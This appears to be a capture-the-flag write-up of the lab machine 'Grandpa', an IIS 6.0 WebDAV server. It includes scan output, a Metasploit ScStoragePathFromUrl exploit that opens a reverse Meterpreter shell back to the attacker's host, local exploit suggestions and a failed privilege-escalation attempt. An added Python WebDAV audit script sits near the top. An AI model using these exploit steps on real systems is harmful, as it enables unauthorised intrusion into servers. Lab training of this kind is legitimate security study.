30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Grandpa

Starting with a port scan.

root@n0w4n:~/opt/htb/grandpa# nmap -T4 -n -sS -sV -sC -p- 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 14:09 CEST
Nmap scan report for 10.10.10.14
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Date: Wed, 27 Jun 2018 12:11:04 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds
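
The method lists in the scan above can be turned into a repeatable audit check. The following is an added example, not part of the original write-up: it parses an OPTIONS response and reports WebDAV exposure, write-capable verbs and an end-of-support server banner. The sample response is constructed from the header values shown in the scan output, and the function names and finding keys are assumptions made for illustration.

```python
import re

# WebDAV extension verbs (RFC 4918, plus SEARCH) and verbs that change server-side content.
WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
WRITE_VERBS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Constructed sample: an OPTIONS response assembled from the header values in the scan output.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
MS-Author-Via: MS-FP/4.0,DAV
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
"""


def parse_headers(raw):
    """Return the response headers as a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.splitlines()[1:]:  # first line is the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def verb_set(value):
    """Split a comma-separated method list into a set of upper-cased verbs."""
    return {v.strip().upper() for v in value.split(",") if v.strip()}


def audit_options(raw):
    """Return a dict of findings for one OPTIONS response (empty dict = nothing flagged)."""
    h = parse_headers(raw)
    allow, public = verb_set(h.get("allow", "")), verb_set(h.get("public", ""))
    findings = {}
    if "dav" in h or allow & WEBDAV_VERBS:
        findings["webdav_enabled"] = sorted(allow & WEBDAV_VERBS)
    if allow & WRITE_VERBS:
        findings["write_verbs_allowed_here"] = sorted(allow & WRITE_VERBS)
    # Verbs the server advertises in Public but does not allow on this URL
    # may still be allowed on other paths, so they are worth reviewing.
    if (public - allow) & WRITE_VERBS:
        findings["write_verbs_public_not_allowed"] = sorted((public - allow) & WRITE_VERBS)
    if "TRACE" in allow:
        findings["trace_allowed"] = True
    # Assumption for this example: IIS 6.0 and older are treated as end of support.
    m = re.match(r"Microsoft-IIS/(\d+)\.(\d+)", h.get("server", ""))
    if m and int(m.group(1)) <= 6:
        findings["end_of_support_server"] = m.group(0)
    return findings


if __name__ == "__main__":
    for key, value in audit_options(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```
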

root@n0w4n:~/opt/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.14/ -e php,txt -x 403,404
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 6344
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-27_14-12-39.log
Target: http://10.10.10.14/
[14:12:39] Starting:
[14:12:49] 301 -  155B  - /_vti_bin  ->  http://10.10.10.14/%5Fvti%5Fbin/
[14:12:49] 200 -    2KB - /_vti_inf.html
[14:12:49] 200 -  195B  - /_vti_bin/_vti_aut/author.dll
[14:12:49] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
[14:12:49] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop
[14:12:49] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl
[14:12:49] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
[14:12:49] 200 -   96B  - /_vti_bin/shtml.dll
[14:12:49] 500 -  112B  - /_vti_pvt/
[14:12:49] 500 -  112B  - /_vti_pvt/administrator.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/authors.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/administrators.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/shtml.exe
[14:12:49] 500 -  112B  - /_vti_pvt/service.pwd
[14:12:49] 500 -  112B  - /_vti_pvt/users.pwd
[14:13:07] 301 -  149B  - /Images  ->  http://10.10.10.14/Images/
[14:13:07] 301 -  149B  - /images  ->  http://10.10.10.14/images/
[14:13:13] 200 -    2KB - /postinfo.html
Task Completed

root@n0w4n:~/opt/htb/grandpa# nikto -h http://10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2018-06-27 14:16:36 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH PROPFIND LOCK UNLOCK COPY PROPPATCH MKCOL listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.
+ 7499 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time:           2018-06-27 14:20:53 (GMT2) (257 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@n0w4n:~/opt/tools/dirsearch# searchsploit webdav
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                     |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 1.3.12 - WebDAV Directory Listings                                                                                                          | exploits/linux/remote/20210.txt
Apache JackRabbit - WebDAV XML External Entity                                                                                                     | exploits/java/webapps/37110.py
Apache Tomcat - 'WebDAV' Remote File Disclosure                                                                                                    | exploits/multiple/remote/4530.pl
Apache Tomcat - WebDAV SSL Remote File Disclosure                                                                                                  | exploits/linux/remote/4552.pl
Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities                                                                                                  | exploits/ios/webapps/27655.txt
Liferay 6.0.x - WebDAV File Reading                                                                                                                | exploits/multiple/remote/18763.txt
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow                                                                                                 | exploits/windows/remote/1.c
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                                                                                    | exploits/windows/remote/16471.rb
Microsoft IIS - WebDAV XML Denial of Service (MS04-030)                                                                                            | exploits/windows/dos/585.pl
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)                                                                         | exploits/windows/remote/41992.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1)                                                         | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2)                                                         | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3)                                                         | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4)                                                         | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)                                                                       | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                                                                                       | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service                                                                               | exploits/windows/dos/20854.txt
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                                                                              | exploits/windows/dos/22670.c
Microsoft IIS 5.0 - WebDAV Remote                                                                                                                  | exploits/windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)                                                                                       | exploits/windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                                                                                     | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                                                           | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                                                                        | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                                                                        | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                                                                      | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                                                                                    | exploits/windows/remote/8754.patch
Microsoft Windows - WebDAV Remote Code Execution (2)                                                                                               | exploits/windows/remote/36.c
Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)                                                                           | exploits/windows/local/39788.txt
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)                                                                 | exploits/windows_x86/local/39432.c
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)                                                         | exploits/windows/local/40085.rb
Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation                                                                          | exploits/windows/local/36424.txt
Neon WebDAV Client Library 0.2x - Format String                                                                                                    | exploits/linux/dos/23999.txt
Nginx 0.7.61 - WebDAV Directory Traversal                                                                                                          | exploits/multiple/remote/9829.txt
Sun Java System Web Server 6.1/7.0 - WebDAV Format String                                                                                          | exploits/multiple/dos/33560.txt
Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)                                                                           | exploits/multiple/remote/16314.rb
WebDAV - Application DLL Hijacker (Metasploit)                                                                                                     | exploits/windows/remote/16550.rb
XAMPP - WebDAV PHP Upload (Metasploit)                                                                                                             | exploits/windows/remote/18367.rb
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Shellcode Title                                                                                                                                   |  Path
                                                                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)                                                     | shellcodes/windows_x86/39519.c
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

OK… I did some enumeration, and it looks like there is a vulnerability in WebDAV which can be exploited through Metasploit.

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                           yes       The target address
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.14.2:4444
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > [*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.14:1142) at 2018-06-27 14:31:41 +0200
meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2212 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
meterpreter > dir
Listing: c:\Documents and Settings
==================================
Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 16:03:34 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 16:04:48 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 16:32:01 +0200  Harry
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 39 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

There are a few suggested possibilities. The box acts a bit unstable, and getting the previous session took some tries. Eventually I got a Meterpreter session.

msf exploit(windows/local/ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] 10.10.10.14 - Meterpreter session 1 closed. Reason: Died

And for the 6th time in a row the process hangs. What is wrong with this machine?

root@n0w4n:~/opt/htb/grandpa# nmap -n -T4 -sS 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:22 CEST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.14 seconds

Looks like the machine is down. Because I have already reset this machine twice, I think that this machine is a bit off. Maybe I will look at it some other time, but for now I will give it a rest and start a new machine.